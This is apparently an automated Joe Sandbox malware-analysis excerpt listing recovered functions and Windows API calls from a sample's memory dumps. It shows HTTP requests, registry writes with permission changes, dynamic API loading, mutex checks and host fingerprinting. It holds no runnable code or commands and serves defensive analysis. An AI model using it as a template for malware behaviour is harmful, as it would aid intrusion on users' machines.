Strings

Xh, xrefs: 0017E5A2
P, xrefs: 0017E5A8

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 0017EDA0, Relevance: 18.2, APIs: 12, Instructions: 197
library

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(?), ref: 0017EDF2
LoadLibraryW.KERNEL32(?), ref: 0017EE19
GetProcAddress.KERNEL32(74E50000,?), ref: 0017EE47
GetProcAddress.KERNEL32(74E50000,?), ref: 0017EE6F
GetProcAddress.KERNEL32(74E50000,?), ref: 0017EE97
GetProcAddress.KERNEL32(74E50000,?), ref: 0017EEBF
GetProcAddress.KERNEL32(74E30000,?), ref: 0017EEE7
GetProcAddress.KERNEL32(74E30000,?), ref: 0017EF0F
GetProcAddress.KERNEL32(74E30000,?), ref: 0017EF37
GetProcAddress.KERNEL32(74E30000,?), ref: 0017EF5B
GetProcAddress.KERNEL32(74E30000,?), ref: 0017EF7F
GetProcAddress.KERNEL32(74E30000,?), ref: 0017EFA3

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 00173E30, Relevance: 16.9, APIs: 11, Instructions: 368

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00175C50: LookupAccountSidW.ADVAPI32(00000000,?,?,00000001,?,?,?), ref: 00175CDB
Part of subcall function 00175C50: memcpy.MSVCRT ref: 00175D81
Part of subcall function 00175C50: memcpy.MSVCRT ref: 00175DA6
Part of subcall function 00175C50: _time64.MSVCRT ref: 00175E4C
Part of subcall function 00175C50: _localtime64.MSVCRT ref: 00175E5D
Part of subcall function 00175C50: wcsftime.MSVCRT ref: 00175E87

VariantInit.OLEAUT32(?), ref: 00176386
VariantInit.OLEAUT32(?), ref: 0017639E

Part of subcall function 001824C0: SysAllocString.OLEAUT32(001763CA), ref: 001824D3

Part of subcall function 001713A0: ??2@YAPAXI@Z.MSVCRT ref: 001713A9
Part of subcall function 001713A0: SysAllocString.OLEAUT32(75CF3F3F), ref: 001713CA

Part of subcall function 00177CF0: InterlockedDecrement.KERNEL32(?), ref: 00177CFE
Part of subcall function 00177CF0: SysFreeString.OLEAUT32(00000000), ref: 00177D13
Part of subcall function 00177CF0: ??_V@YAXPAX@Z.MSVCRT ref: 00177D21
Part of subcall function 00177CF0: ??3@YAXPAX@Z.MSVCRT ref: 00177D2A

VariantClear.OLEAUT32(?), ref: 001764AC
VariantClear.OLEAUT32(?), ref: 001764B2
VariantClear.OLEAUT32(?), ref: 001764B8
VariantInit.OLEAUT32(?), ref: 001764F9
VariantInit.OLEAUT32(?), ref: 00176517
VariantInit.OLEAUT32(?), ref: 00176538
VariantClear.OLEAUT32(?), ref: 0017660F
VariantClear.OLEAUT32(?), ref: 00176618
VariantClear.OLEAUT32(?), ref: 0017661E

Part of subcall function 00176E00: GetTokenInformation.KERNELBASE(?,00000001,?,0000004C,?), ref: 00176E5D

Part of subcall function 001827B0: GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,00000001,?,?,80000001,?,00176342,?,?,?,?,0017FF94), ref: 0018282F

Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73

Part of subcall function 001733A0: VariantClear.OLEAUT32(?), ref: 00173432
Part of subcall function 001733A0: SysFreeString.OLEAUT32(0017632B), ref: 0017345C
Part of subcall function 001733A0: SysFreeString.OLEAUT32(?), ref: 001734D6
Part of subcall function 001733A0: VariantClear.OLEAUT32(?), ref: 00173575
Part of subcall function 001733A0: SysFreeString.OLEAUT32(?), ref: 0017359B

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 00178820, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 115
time

Control-flow Graph

Executed
Not Executed

APIs

WinHttpCloseHandle.WINHTTP(?,00000000,00000000), ref: 0017884E
WinHttpSetTimeouts.WINHTTP(?,00015F90,00015F90,0002BF20,000927C0,00000000,00000000), ref: 0017886F
WinHttpOpenRequest.WINHTTP(?,?,00000004,00000000,00000000,00000000,?), ref: 001788A6
WinHttpSetOption.WINHTTP(00000000,0000001F,00000004,00000004), ref: 001788C8
WinHttpSendRequest.WINHTTP(?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001788DC
WinHttpCloseHandle.WINHTTP(?,00000000,00000000), ref: 00178900
WinHttpReceiveResponse.WINHTTP(?,00000000), ref: 0017891D
WinHttpQueryHeaders.WINHTTP(?,20000013,00000000,?,00000004,00000000), ref: 0017893A

Strings

q*\n)W\n, xrefs: 0017884E, 00178900

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 0017D796, Relevance: 15.1, APIs: 10, Instructions: 135
sleep

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 001771D1: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00177208
Part of subcall function 001771D1: GetCurrentProcessId.KERNEL32 ref: 00177214
Part of subcall function 001771D1: GetCurrentThreadId.KERNEL32 ref: 0017721C
Part of subcall function 001771D1: GetTickCount.KERNEL32 ref: 00177224
Part of subcall function 001771D1: QueryPerformanceCounter.KERNEL32(?), ref: 00177230

GetStartupInfoW.KERNEL32(?,001871B0,0000005C), ref: 0018358E
InterlockedCompareExchange.KERNEL32(00188880,?,00000000), ref: 001835B6
Sleep.KERNEL32(000003E8), ref: 001835D1
_amsg_exit.MSVCRT ref: 001835E7
__initterm_e.LIBCMT ref: 00183608
_initterm.MSVCRT ref: 00183631
InterlockedExchange.KERNEL32(00188880,00000000), ref: 00183649

Part of subcall function 0017FE30: Sleep.KERNELBASE(00000001), ref: 0017FE80
Part of subcall function 0017FE30: SetCurrentDirectoryW.KERNELBASE(?), ref: 0017FEF3
Part of subcall function 0017FE30: srand.MSVCRT ref: 0017FF04
Part of subcall function 0017FE30: GetCurrentProcess.KERNEL32(?), ref: 0017FF44
Part of subcall function 0017FE30: IsWow64Process.KERNELBASE(00000000), ref: 0017FF4B
Part of subcall function 0017FE30: ??2@YAPAXI@Z.MSVCRT ref: 0017FF74
Part of subcall function 0017FE30: ??3@YAXPAX@Z.MSVCRT ref: 0017FFB1
Part of subcall function 0017FE30: ??2@YAPAXI@Z.MSVCRT ref: 00180004
Part of subcall function 0017FE30: CreateThread.KERNEL32(00000000,00000000,00182A70,?,00000000,?,?,?,?), ref: 001800FA
Part of subcall function 0017FE30: _time64.MSVCRT ref: 0018014D
Part of subcall function 0017FE30: _time64.MSVCRT ref: 00180338
Part of subcall function 0017FE30: _time64.MSVCRT ref: 001804B4
Part of subcall function 0017FE30: ExitProcess.KERNEL32 ref: 00180706

exit.MSVCRT ref: 001836D4
_cexit.MSVCRT ref: 00183727

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 00175C50, Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 313

Control-flow Graph

Executed
Not Executed

APIs

LookupAccountSidW.ADVAPI32(00000000,?,?,00000001,?,?,?), ref: 00175CDB
memcpy.MSVCRT ref: 00175D81
memcpy.MSVCRT ref: 00175DA6

Part of subcall function 00181F60: LoadLibraryA.KERNEL32(?), ref: 00181F87
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FA8
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FCE
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FEC
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 0018200A
Part of subcall function 00181F60: GetProcessHeap.KERNEL32 ref: 00182015
Part of subcall function 00181F60: RtlReAllocateHeap.NTDLL(001B0000,00000008,?,00180639), ref: 0018202F
Part of subcall function 00181F60: RtlAllocateHeap.NTDLL(001B0000,00000008,00180639), ref: 00182042

_time64.MSVCRT ref: 00175E4C
_localtime64.MSVCRT ref: 00175E5D
wcsftime.MSVCRT ref: 00175E87

Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73

Strings

<, xrefs: 00175E52

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 00181F60, Relevance: 12.1, APIs: 8, Instructions: 98
library

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(?), ref: 00181F87
GetProcAddress.KERNEL32(00000000,?), ref: 00181FA8
GetProcAddress.KERNEL32(00000000,?), ref: 00181FCE
GetProcAddress.KERNEL32(00000000,?), ref: 00181FEC
GetProcAddress.KERNEL32(00000000,?), ref: 0018200A
GetProcessHeap.KERNEL32 ref: 00182015
RtlReAllocateHeap.NTDLL(001B0000,00000008,?,00180639), ref: 0018202F
RtlAllocateHeap.NTDLL(001B0000,00000008,00180639), ref: 00182042

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 00182870, Relevance: 10.6, APIs: 7, Instructions: 122
registry

Control-flow Graph

Executed
Not Executed

APIs

StrChrW.SHLWAPI(?,0000005C), ref: 001828A3
RegOpenKeyExW.KERNEL32(80000002,-00000002), ref: 001828B8
GetSecurityInfo.ADVAPI32(?,00000004,00000004,00000000,00000000,?,00000000,00000000), ref: 001828DD

Part of subcall function 001780B0: memset.MSVCRT ref: 00178138
Part of subcall function 001780B0: SetSecurityInfo.ADVAPI32(?,?,00000004,00000000,00000000,?,00000000), ref: 001781B5

StrChrW.SHLWAPI(?,0000005C), ref: 00182906
RegOpenKeyExW.KERNEL32(80000002,-00000002), ref: 00182921
RegSetValueExW.KERNEL32(?,?,00000000,00000004,?,00000004), ref: 00182946
SetNamedSecurityInfoW.ADVAPI32(?,00000004,00000004,00000000,00000000,?,00000000), ref: 00182962

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 00176A70, Relevance: 9.3, APIs: 6, Instructions: 255

Control-flow Graph

Executed
Not Executed

APIs

??2@YAPAXI@Z.MSVCRT ref: 00176A86
??2@YAPAXI@Z.MSVCRT ref: 00176AA1

Part of subcall function 00173D50: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,?,?,?,001816E1,?,00171C1A,?), ref: 00173D7E
Part of subcall function 00173D50: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,?,001816E1,?,00171C1A,?,?,000000B3,00000000,?,?), ref: 00173D9B
Part of subcall function 00173D50: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,001816E1,?,00171C1A,?,?,000000B3,00000000,?,?), ref: 00173DB0
Part of subcall function 00173D50: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?), ref: 00173DE8

Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73

??3@YAXPAX@Z.MSVCRT ref: 00176BB0
??3@YAXPAX@Z.MSVCRT ref: 00176BDE
??3@YAXPAX@Z.MSVCRT ref: 00176C48
??3@YAXPAX@Z.MSVCRT ref: 00176CA1

Part of subcall function 00171AD0: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000,0000001F,00000000,00171C1A,?,0018190D,?,00171C1A,?,?), ref: 00171AFB
Part of subcall function 00171AD0: WriteFile.KERNEL32(00000000,?,00171C1A,000000CC,00000000,?,0018190D,?,00171C1A,?,?,000000CC), ref: 00171B1D

Part of subcall function 0017CCF0: SysFreeString.OLEAUT32(?), ref: 0017CD01

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 0017FE58, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 145
threadsleep

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00173E30: VariantInit.OLEAUT32(?), ref: 00176386
Part of subcall function 00173E30: VariantInit.OLEAUT32(?), ref: 0017639E
Part of subcall function 00173E30: VariantClear.OLEAUT32(?), ref: 001764AC
Part of subcall function 00173E30: VariantClear.OLEAUT32(?), ref: 001764B2
Part of subcall function 00173E30: VariantClear.OLEAUT32(?), ref: 001764B8
Part of subcall function 00173E30: VariantInit.OLEAUT32(?), ref: 001764F9
Part of subcall function 00173E30: VariantInit.OLEAUT32(?), ref: 00176517
Part of subcall function 00173E30: VariantInit.OLEAUT32(?), ref: 00176538
Part of subcall function 00173E30: VariantClear.OLEAUT32(?), ref: 0017660F
Part of subcall function 00173E30: VariantClear.OLEAUT32(?), ref: 00176618
Part of subcall function 00173E30: VariantClear.OLEAUT32(?), ref: 0017661E

Part of subcall function 00171B70: memset.MSVCRT ref: 00171BA3
Part of subcall function 00171B70: memset.MSVCRT ref: 00171BB2
Part of subcall function 00171B70: ??2@YAPAXI@Z.MSVCRT ref: 00171BC9
Part of subcall function 00171B70: ??2@YAPAXI@Z.MSVCRT ref: 00171BE8

Part of subcall function 00171F50: memcpy.MSVCRT ref: 00171FEC

Part of subcall function 00176A70: ??2@YAPAXI@Z.MSVCRT ref: 00176A86
Part of subcall function 00176A70: ??2@YAPAXI@Z.MSVCRT ref: 00176AA1
Part of subcall function 00176A70: ??3@YAXPAX@Z.MSVCRT ref: 00176BB0
Part of subcall function 00176A70: ??3@YAXPAX@Z.MSVCRT ref: 00176BDE
Part of subcall function 00176A70: ??3@YAXPAX@Z.MSVCRT ref: 00176C48
Part of subcall function 00176A70: ??3@YAXPAX@Z.MSVCRT ref: 00176CA1

Part of subcall function 0017FAD0: ??3@YAXPAX@Z.MSVCRT ref: 0017FB8D
Part of subcall function 0017FAD0: ??3@YAXPAX@Z.MSVCRT ref: 0017FBA4

Part of subcall function 00175780: ??2@YAPAXI@Z.MSVCRT ref: 001757D5
Part of subcall function 00175780: ??3@YAXPAX@Z.MSVCRT ref: 0017582F

Part of subcall function 0017DA20: ??2@YAPAXI@Z.MSVCRT ref: 0017DA7A
Part of subcall function 0017DA20: ??3@YAXPAX@Z.MSVCRT ref: 0017DAB9
Part of subcall function 0017DA20: _time64.MSVCRT ref: 0017DADB
Part of subcall function 0017DA20: ??3@YAXPAX@Z.MSVCRT ref: 0017DB0B

Part of subcall function 00181D50: ??2@YAPAXI@Z.MSVCRT ref: 00181D7F
Part of subcall function 00181D50: ??3@YAXPAX@Z.MSVCRT ref: 00181DBE
Part of subcall function 00181D50: _time64.MSVCRT ref: 00181DE0
Part of subcall function 00181D50: ??3@YAXPAX@Z.MSVCRT ref: 00181E0D

Part of subcall function 0017ADB0: ??3@YAXPAX@Z.MSVCRT ref: 0017ADEF
Part of subcall function 0017ADB0: ??3@YAXPAX@Z.MSVCRT ref: 0017AF9A

Part of subcall function 001814C0: WSAStartup.WS2_32(00000202,?), ref: 001814E2
Part of subcall function 001814C0: gethostname.WS2_32(?,000000FF), ref: 00181502
Part of subcall function 001814C0: getaddrinfo.WS2_32(?,00000000,00000000,00000000), ref: 00181522
Part of subcall function 001814C0: freeaddrinfo.WS2_32(00000000), ref: 00181580
Part of subcall function 001814C0: WSACleanup.WS2_32 ref: 00181586

Part of subcall function 00175A90: Sleep.KERNEL32(00009C40,?,?,?,?,?,?,?,00000000,001800C1), ref: 00175B3F

Part of subcall function 001737C0: memcpy.MSVCRT ref: 00173CA0

Part of subcall function 00172030: ??2@YAPAXI@Z.MSVCRT ref: 0017207A
Part of subcall function 00172030: ??3@YAXPAX@Z.MSVCRT ref: 00172176
Part of subcall function 00172030: _time64.MSVCRT ref: 001721A8
Part of subcall function 00172030: ??3@YAXPAX@Z.MSVCRT ref: 001721CF

Part of subcall function 00179AB0: WSAStartup.WS2_32(00000202,?), ref: 00179ADA
Part of subcall function 00179AB0: freeaddrinfo.WS2_32(00000000,0018043A), ref: 00179B3B
Part of subcall function 00179AB0: getaddrinfo.WS2_32(0018043A,00000000,?,00000000), ref: 00179BD6
Part of subcall function 00179AB0: freeaddrinfo.WS2_32(00000000), ref: 00179C1E
Part of subcall function 00179AB0: WSACleanup.WS2_32 ref: 00179C44

Part of subcall function 00182AD0: ??2@YAPAXI@Z.MSVCRT ref: 00182ADD
Part of subcall function 00182AD0: ??3@YAXPAX@Z.MSVCRT ref: 00182B54
Part of subcall function 00182AD0: _time64.MSVCRT ref: 00182B82
Part of subcall function 00182AD0: ??3@YAXPAX@Z.MSVCRT ref: 00182BAA

Part of subcall function 0017EAC0: CoCreateInstance.OLE32(0018708C,00000000,00000001,00186E7C,00000004,00188880,000003E7,0017FF87), ref: 0017EB17

Part of subcall function 00182BC0: ??2@YAPAXI@Z.MSVCRT ref: 00182C56
Part of subcall function 00182BC0: ??2@YAPAXI@Z.MSVCRT ref: 00182C90
Part of subcall function 00182BC0: ??2@YAPAXI@Z.MSVCRT ref: 00182CDB
Part of subcall function 00182BC0: ??3@YAXPAX@Z.MSVCRT ref: 00182D75
Part of subcall function 00182BC0: ??3@YAXPAX@Z.MSVCRT ref: 00182D8A
Part of subcall function 00182BC0: ??3@YAXPAX@Z.MSVCRT ref: 00182D9E

Sleep.KERNELBASE(00000001), ref: 0017FE80
SetCurrentDirectoryW.KERNELBASE(?), ref: 0017FEF3
srand.MSVCRT ref: 0017FF04

Part of subcall function 0017EDA0: LoadLibraryW.KERNEL32(?), ref: 0017EDF2
Part of subcall function 0017EDA0: LoadLibraryW.KERNEL32(?), ref: 0017EE19
Part of subcall function 0017EDA0: GetProcAddress.KERNEL32(74E50000,?), ref: 0017EE47
Part of subcall function 0017EDA0: GetProcAddress.KERNEL32(74E50000,?), ref: 0017EE6F
Part of subcall function 0017EDA0: GetProcAddress.KERNEL32(74E50000,?), ref: 0017EE97
Part of subcall function 0017EDA0: GetProcAddress.KERNEL32(74E50000,?), ref: 0017EEBF
Part of subcall function 0017EDA0: GetProcAddress.KERNEL32(74E30000,?), ref: 0017EEE7

Part of subcall function 0017BC10: CoInitializeEx.OLE32(00000000,00000000), ref: 0017BC14
Part of subcall function 0017BC10: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 0017BC33

GetCurrentProcess.KERNEL32(?), ref: 0017FF44
IsWow64Process.KERNELBASE(00000000), ref: 0017FF4B
??2@YAPAXI@Z.MSVCRT ref: 0017FF74
??3@YAXPAX@Z.MSVCRT ref: 0017FFB1
??2@YAPAXI@Z.MSVCRT ref: 00180004
CreateThread.KERNEL32(00000000,00000000,00182A70,?,00000000,?,?,?,?), ref: 001800FA
_time64.MSVCRT ref: 0018014D
_time64.MSVCRT ref: 00180338
_time64.MSVCRT ref: 001804B4

Part of subcall function 0017C980: _itow.MSVCRT ref: 0017C999

ExitProcess.KERNEL32 ref: 00180706

Part of subcall function 00181F60: LoadLibraryA.KERNEL32(?), ref: 00181F87
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FA8
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FCE
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FEC
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 0018200A
Part of subcall function 00181F60: GetProcessHeap.KERNEL32 ref: 00182015
Part of subcall function 00181F60: RtlReAllocateHeap.NTDLL(001B0000,00000008,?,00180639), ref: 0018202F
Part of subcall function 00181F60: RtlAllocateHeap.NTDLL(001B0000,00000008,00180639), ref: 00182042

Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73

Part of subcall function 001735E0: CreateMutexW.KERNELBASE(?,00000001,?), ref: 0017366B
Part of subcall function 001735E0: ExitProcess.KERNEL32 ref: 0017368E

Strings

D, xrefs: 0018061D

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 001733A0, Relevance: 7.7, APIs: 5, Instructions: 229

Control-flow Graph

Executed
Not Executed

APIs

VariantClear.OLEAUT32(?), ref: 00173575
SysFreeString.OLEAUT32(?), ref: 0017359B

Part of subcall function 001733A0: VariantClear.OLEAUT32(?), ref: 00173432
Part of subcall function 001733A0: SysFreeString.OLEAUT32(0017632B), ref: 0017345C
Part of subcall function 001733A0: SysFreeString.OLEAUT32(?), ref: 001734D6

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 0017F320, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74

APIs

memset.MSVCRT ref: 0017F33E
GetWindowsDirectoryW.KERNEL32(?,00000208), ref: 0017F352
GetVolumeInformationW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0017F38E

Part of subcall function 00180E20: _vsnwprintf.MSVCRT ref: 00180E52

Strings

:, xrefs: 0017F383

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 001716E0, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37

APIs

WinHttpCloseHandle.WINHTTP(?,00000000,0017CFBA,0018311D), ref: 001716F2
WinHttpCloseHandle.WINHTTP(?,00000000,0017CFBA,0018311D), ref: 001716FC
WinHttpCloseHandle.WINHTTP(?,00000000,0017CFBA,0018311D), ref: 00171706

Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73

Strings

q*\n)W\n, xrefs: 001716E7

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 001789B0, Relevance: 6.6, APIs: 3, Strings: 1, Instructions: 576

APIs

memset.MSVCRT ref: 001789FA
memset.MSVCRT ref: 00178A0C

Part of subcall function 00179070: ??3@YAXPAX@Z.MSVCRT ref: 0017911F

Part of subcall function 0017A380: memset.MSVCRT ref: 0017A3B2

Part of subcall function 00181F60: LoadLibraryA.KERNEL32(?), ref: 00181F87
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FA8
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FCE
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FEC
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 0018200A
Part of subcall function 00181F60: GetProcessHeap.KERNEL32 ref: 00182015
Part of subcall function 00181F60: RtlReAllocateHeap.NTDLL(001B0000,00000008,?,00180639), ref: 0018202F
Part of subcall function 00181F60: RtlAllocateHeap.NTDLL(001B0000,00000008,00180639), ref: 00182042

memcpy.MSVCRT ref: 00178F45

Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73

Strings

z, xrefs: 00178D65

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 0017DA20, Relevance: 6.1, APIs: 4, Instructions: 98

APIs

Part of subcall function 00175A90: Sleep.KERNEL32(00009C40,?,?,?,?,?,?,?,00000000,001800C1), ref: 00175B3F

??2@YAPAXI@Z.MSVCRT ref: 0017DA7A
??3@YAXPAX@Z.MSVCRT ref: 0017DAB9

Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73

_time64.MSVCRT ref: 0017DADB
??3@YAXPAX@Z.MSVCRT ref: 0017DB0B

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 00181D50, Relevance: 6.1, APIs: 4, Instructions: 84

APIs

Part of subcall function 00175A90: Sleep.KERNEL32(00009C40,?,?,?,?,?,?,?,00000000,001800C1), ref: 00175B3F

??2@YAPAXI@Z.MSVCRT ref: 00181D7F
??3@YAXPAX@Z.MSVCRT ref: 00181DBE

Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73

_time64.MSVCRT ref: 00181DE0
??3@YAXPAX@Z.MSVCRT ref: 00181E0D

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

